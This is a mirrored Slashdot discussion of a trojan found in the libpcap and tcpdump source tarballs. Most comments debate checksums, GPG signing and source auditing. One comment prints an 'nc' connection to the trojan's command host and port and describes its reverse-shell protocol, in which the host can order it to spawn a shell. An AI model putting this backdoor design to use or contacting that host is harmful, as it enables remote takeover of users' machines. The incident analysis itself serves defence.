Slashdot Mirror

← Back to Stories (view on slashdot.org)

Trojan Found in libpcap and tcpdump

Posted by michael on from the when-your-packet-sniffer-won't dept.

msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."

19 of 486 comments (clear)

  1. Eventually, this would happen by Rotten · · Score: 5, Insightful

    And if I don't remember, this happened befrore. Of course this is one of the biggest strenghts of the Open Source Model.
    Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows but on Open Source is easyly detected.

    1. Re:Eventually, this would happen by Rotten · · Score: 4, Insightful

      Of course you have never disected a rootkited server. Nobody trust the date stamps, not even my grandmother does it.

      Have you ever changed the date of a file? It's quite easy.

    2. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Insightful
      In handling the press and public perception for this, it's important that we make the point that binary programs are trojaned all of the time. In fact, most viruses have as their sole purpose the modification of binaries to insert a trojan copy of the virus into the binary, and to execute the virus payload. Much proprietary software has been distributed in infected state.

      The difference is that with Open Source you have an additional means of detecting the corruption - not only by its effects (as with the binary), but by reading the source.

      Bruce

      --
      Bruce Perens.
    3. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Insightful
      Also, we need to get better about signing our archives and heeding the signatures. Com'on folks! I wrote about this in the old linuxworld.com webzine in 1996!

      Bruce

      --
      Bruce Perens.
  2. MD5 checksums by Zayin · · Score: 4, Insightful

    Use them.

    --
    "I'd rather have a full bottle in front of me than a full frontal lobotomy"
    1. Re:MD5 checksums by diamondc · · Score: 5, Insightful

      if someone breaks into an ftp server, they might as well replace the md5 signatures, too. a better solution would be signing the sources with a gpg key.

      --
      "I keep looking in the want-ads under 'revolutionary' but there don't seem to be any listings.. "
  3. One too many? by simpleguy · · Score: 4, Insightful

    Isn't this one too many?

    There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?

    Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?

    At least that's what I think.

    1. Re:One too many? by LostCluster · · Score: 5, Insightful

      As Linux becomes more popular, the dumber system admins who never patched their Windows systems now have Linux systems. All it takes is a small handful of people to not know there is a wide-open back door, or worse yet know but be too lazy to take the corrective action, and there's enough zombies to cause headaches.

  4. Re:This is dreadful by jimand · · Score: 5, Insightful

    there's no-one to pay me to pay my staff for the lost man-hours caused by this

    Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.

  5. Don't jump to conclusions by astrashe · · Score: 5, Insightful

    The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.

    It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.

  6. Re:Seems by paranoos · · Score: 5, Insightful

    If some malicious coder could upload manipulated software, do you not think they could also spoof the MD5 sum also? From what I've seen, the checksum is usually just stored in a text file in the same directory.

  7. Re:This is dreadful by gowen · · Score: 5, Insightful
    I run a successful London-based dot com
    Wow. And just minutes ago you were a succesful lawyer. I'm so jealous.
    --
    Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
  8. Uncommented trojan by magi · · Score: 5, Insightful

    The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It even doesn't have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.

    Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.

    Well, ok, crackers probably want to obfuscate their code with /* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.

    I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.

    Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.

  9. Re:This is dreadful by Hostile17 · · Score: 5, Insightful

    "It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "

    And this is different from Closed Source how ?

    Doesn't the money come from the money you`ve saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!

    Same place it will come from if you use Closed Source software, using Open Source products does not mean zero cost IT, it means lower cost IT. If your company did plan for these things, then it will make no difference what products you are using.

    --
    Fascism should more properly be called corporatism, since it is the merger of state and corporate power - Benito Mussoli
  10. DEMAND PGP SIGNATURES!!!! by aphor · · Score: 5, Insightful

    The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.

    Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bit, but the key will be exposed and others will be able to quickly identify their risk.

    At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!

    --
    --- Nothing clever here: move along now...
    1. Re:DEMAND PGP SIGNATURES!!!! by jonabbey · · Score: 5, Insightful

      And for god's sake, keep your private signing key encrypted in your gpg keyring, or offline.

      --
      - jon

      Ganymede, a GPL'ed metadirectory for UNIX
  11. Re:Glad I use Gentoo by taviso · · Score: 4, Insightful

    I think the worst thing is that the server the trojan connects to is still operating :

    $ nc -vvv 212.146.0.34 1963
    mars.raketti.net [212.146.0.34] 1963 (?) open
    M sent 0, rcvd 1

    The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:

    A - program exits
    D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
    M - closes connection, sleeps 3600 seconds, and then reconnects


    maybe someone should contact the machine administrator before more people get owned.

    --
    ex$$
  12. How is this fair? by kiwimate · · Score: 5, Insightful

    This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.

    All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.

    And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.

    Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.

  13. Re:as soon as this evening... by harlows_monkeys · · Score: 5, Insightful
    The funny thing about the paranoids who build from source is that, unless they actually look at the source, it doesn't gain them anything. There are three ways to build from source.

    1. Just grab the source and build it. This is no better than grabbing a binary and running it, as far as security goes.

    2. Grab the source, check the MD5 sum, and then build it. This is no better than grabbing the binary, checking the binary's MD5 sum, and then running it.

    3. Grab the source, diff it against the previous source you were running, and at least glance at the diffs to see if anything looks suspicious. This is the only way that using source gives you more security than using the binary.

    People using source for security who are in category 1 or 2 are just fooling themselves.